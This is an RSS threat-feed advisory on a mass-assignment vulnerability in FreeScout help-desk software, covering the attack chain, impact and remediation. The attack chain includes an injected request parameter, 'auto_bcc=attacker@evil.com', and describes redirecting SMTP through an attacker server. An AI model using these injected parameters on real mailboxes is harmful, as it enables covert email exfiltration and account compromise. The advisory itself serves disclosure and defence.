<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Mass-Assignment — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/mass-assignment/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Wed, 22 Apr 2026 12:00:00 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/mass-assignment/feed.xml" rel="self" type="application/rss+xml"/><item><title>FreeScout Mass Assignment Vulnerability (CVE-2026-40569)</title><link>https://feed.craftedsignal.io/briefs/2026-04-freescout-mass-assignment/</link><pubDate>Wed, 22 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-freescout-mass-assignment/</guid><description>FreeScout versions prior to 1.8.213 contain a mass assignment vulnerability allowing authenticated admins to modify sensitive mailbox settings by injecting parameters into connection settings requests, leading to email exfiltration and account compromise.</description><content:encoded><![CDATA[<p>FreeScout, a self-hosted help desk and shared mailbox platform, is vulnerable to a mass assignment flaw (CVE-2026-40569) in versions prior to 1.8.213. The vulnerability resides in the <code>connectionIncomingSave()</code> and <code>connectionOutgoingSave()</code> methods within <code>app/Http/Controllers/MailboxesController.php</code>.  These methods lack proper input validation, allowing an authenticated administrator to overwrite critical mailbox settings by injecting arbitrary parameters into legitimate connection setting update requests. Attackers can modify fields like <code>auto_bcc</code>, <code>out_server</code>, <code>out_password</code>, <code>signature</code>, <code>auto_reply_enabled</code>, and <code>auto_reply_message</code>. This issue allows malicious actors to silently surveil communications, redirect SMTP traffic, inject malicious content, and persistently compromise email accounts. The impact is particularly severe in multi-admin environments or when an admin session is compromised through other means (e.g., XSS). FreeScout version 1.8.213 addresses this vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains authenticated access to the FreeScout admin panel, either through legitimate credentials or by exploiting another vulnerability (e.g., XSS).</li>
<li>The attacker navigates to the mailbox connection settings page.</li>
<li>The attacker crafts a legitimate request to update connection settings, such as IMAP or SMTP server details.</li>
<li>The attacker injects malicious parameters into the request, such as <code>auto_bcc=attacker@evil.com</code>, which are not directly exposed in the connection settings form.</li>
<li>The FreeScout application, due to the mass assignment vulnerability in <code>connectionIncomingSave()</code> or <code>connectionOutgoingSave()</code>, processes the injected parameters and updates the corresponding mailbox settings in the database.</li>
<li>When <code>auto_bcc</code> is set, every outgoing email from the compromised mailbox is silently BCC&rsquo;d to the attacker-controlled email address via the <code>SendReplyToCustomer</code> job.</li>
<li>Alternatively, the attacker could modify the <code>out_server</code> and <code>out_password</code> fields to redirect outgoing SMTP traffic through an attacker-controlled server.</li>
<li>The attacker gains persistent access to all outgoing email from the affected mailbox, enabling data exfiltration or further malicious activities like phishing.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability can lead to complete compromise of FreeScout mailboxes. An attacker could silently exfiltrate sensitive email communications, potentially impacting hundreds or thousands of users depending on the size of the organization. The injected parameters persist even after the initial attack, providing long-term access. This is especially dangerous in organizations that handle sensitive customer data or financial information. The ability to redirect SMTP traffic and inject malicious content further amplifies the risk, potentially leading to widespread phishing campaigns and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade FreeScout to version 1.8.213 or later to patch CVE-2026-40569 immediately.</li>
<li>Implement strict input validation and sanitization for all user-supplied data, particularly in the <code>connectionIncomingSave()</code> and <code>connectionOutgoingSave()</code> methods, to prevent mass assignment vulnerabilities.</li>
<li>Review existing FreeScout installations for any unauthorized modifications to mailbox settings, specifically focusing on <code>auto_bcc</code>, <code>out_server</code>, <code>out_password</code>, <code>signature</code>, <code>auto_reply_enabled</code>, and <code>auto_reply_message</code> fields (requires direct database inspection).</li>
<li>Monitor FreeScout webserver logs for POST requests to <code>/mailboxes/*/connection/incoming-save</code> and <code>/mailboxes/*/connection/outgoing-save</code> endpoints containing unexpected parameters to detect potential exploitation attempts (see example Sigma rule below).</li>
<li>Enable webserver logging and ensure that POST request bodies are captured to facilitate investigation and detection.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>freescout</category><category>mass-assignment</category><category>vulnerability</category><category>email-exfiltration</category></item></channel></rss>